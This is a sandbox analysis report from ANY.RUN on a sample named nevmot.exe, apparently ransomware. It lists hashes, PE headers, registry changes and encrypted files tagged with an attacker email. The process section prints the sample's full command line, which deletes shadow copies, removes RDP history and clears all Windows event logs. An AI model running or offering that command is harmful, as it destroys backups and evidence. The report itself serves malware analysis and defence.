analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

nevmot.exe

Full analysis: https://app.any.run/tasks/07a8682e-e496-4431-ac3d-1dadc006d748
Verdict: Malicious activity
Analysis date: May 20, 2022, 15:54:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

A17E17ADA330AD1CF102348130B876D3

SHA1:

C0A3D43F3E8B00B3119B12E0C0F23BE0332C8D2C

SHA256:

D258F26B1C32CD4E15A52D3F8009323E185A96EA78B50EC9C7232C1B970E1365

SSDEEP:

768:W7U7YXIPfvIq8hWWbGO73oKf9P8lYeNXaPA0qu1w9LE7FCICT1zl8DAN74OnSxVW:AJ73aNvqS9MYT1z+DA93nSxStmCbxzr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Deletes shadow copies

      • cmd.exe (PID: 2948)

    • Changes the autorun value in the registry

      • nevmot.exe (PID: 1332)

    • Drops executable file immediately after starts

      • nevmot.exe (PID: 1332)

  • SUSPICIOUS

    • Checks supported languages

      • nevmot.exe (PID: 1332)

    • Reads the computer name

      • nevmot.exe (PID: 1332)

    • Starts CMD.EXE for commands execution

      • nevmot.exe (PID: 1332)

    • Executable content was dropped or overwritten

      • nevmot.exe (PID: 1332)

    • Drops a file with a compile date too recent

      • nevmot.exe (PID: 1332)

  • INFO

    • Checks supported languages

      • cmd.exe (PID: 2948)
      • vssadmin.exe (PID: 3404)

    • Reads the computer name

      • vssadmin.exe (PID: 3404)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0xc16b
UninitializedDataSize: -
InitializedDataSize: -
CodeSize: 70656
LinkerVersion: 12
PEType: PE32
TimeStamp: 2022:01:16 02:07:41+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 16-Jan-2022 01:07:41

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 1
Time date stamp: 16-Jan-2022 01:07:41
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LARGE_ADDRESS_AWARE
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.rdata
0x00001000
0x00013CF2
0x00013E00
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
6.00458

Imports

KERNEL32.dll
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start nevmot.exe cmd.exe no specs vssadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1332"C:\Users\admin\AppData\Local\Temp\nevmot.exe" C:\Users\admin\AppData\Local\Temp\nevmot.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
2948"C:\Windows\system32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" cd %userprofile%\documents\ attrib Default.rdp -s -h del Default.rdp for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"C:\Windows\system32\cmd.exenevmot.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3404vssadmin.exe Delete Shadows /All /QuietC:\Windows\system32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
178
Read events
169
Write events
9
Delete events
0

Modification events

(PID) Process:(1332) nevmot.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Operation:writeName:LicChk
Value:
C:\Users\admin\AppData\Local\nevmot.exe
(PID) Process:(1332) nevmot.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(1332) nevmot.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(1332) nevmot.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(1332) nevmot.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
1
Suspicious files
1 985
Text files
5
Unknown types
239

Dropped files

PID
Process
Filename
Type
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-040C-0000-0000000FF1CE}-C\Read Me!.HtAhtm
MD5:E9BC8D27F287EBFAD07B346DE7BCB578
SHA256:545AD190EE97D27A7F8637442AC1C99ABFF2744301705D14C0978A9EEF0D1088
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-040C-0000-0000000FF1CE}-C\Setup.xml.[[email protected]]binary
MD5:D3CB217B59E1179FB72919FF0A38D4AE
SHA256:3E91542C37BECD9FFCE9DF573F6166118B16FA9A67201C5629E6F412B742CA63
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-0407-0000-0000000FF1CE}-C\Read Me!.HtAhtm
MD5:E9BC8D27F287EBFAD07B346DE7BCB578
SHA256:545AD190EE97D27A7F8637442AC1C99ABFF2744301705D14C0978A9EEF0D1088
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-0412-0000-0000000FF1CE}-C\AccessMUI.xml.[[email protected]]binary
MD5:5171D1940D7B5338E6DC67F4CB48016C
SHA256:92045B0E706E2E5C89829E76E75E6E0434043E154EEB87301E7B75ED8C17BB13
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-0410-0000-0000000FF1CE}-C\AccessMUI.xml.[[email protected]]binary
MD5:5AFC4D4C17EB34451354DE7FAAE89954
SHA256:C4FA9C2C4639711A7F4CDD55ECC5D84680F7E18A62AD3D915C8F1A05E904E6D1
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-0411-0000-0000000FF1CE}-C\branding.xml.[[email protected]]binary
MD5:E96E2B4B84D097C783928D661D5D3568
SHA256:715B26F53908A3D12484FA67572FBE1749B4A0CEE97DA15F5F84C8610B337E7F
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-0410-0000-0000000FF1CE}-C\Setup.xml.[[email protected]]binary
MD5:DAD97902349B687A3A70994DD1AD61F4
SHA256:100379522EA22A55BEEBC75DF7AA479D053B2F00E61966DB71723936D483C730
1332nevmot.exeC:\Users\admin\AppData\Local\nevmot.exeexecutable
MD5:A17E17ADA330AD1CF102348130B876D3
SHA256:D258F26B1C32CD4E15A52D3F8009323E185A96EA78B50EC9C7232C1B970E1365
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-0407-0000-0000000FF1CE}-C\Setup.xml.[[email protected]]binary
MD5:342F59AA33C94001CAD2E6D35BEE0FD3
SHA256:2C1A1FD161F255DA5CF5CDE10BBF876EB207756537EC96A5FAB74B0D02FE01CE
1332nevmot.exeC:\MSOCache\All Users\{90140000-0015-040C-0000-0000000FF1CE}-C\AccessMUI.xml.[[email protected]]binary
MD5:F6B5030011A997AE250135191B733CDF
SHA256:1FD429467D421C5F2B52F9A0A08EC9876ECCDF81B196EEA63FCBBC8F394A66CE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.2:53
whitelisted

DNS requests

Domain
IP
Reputation
www.microsoft.com
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
nevmot.exe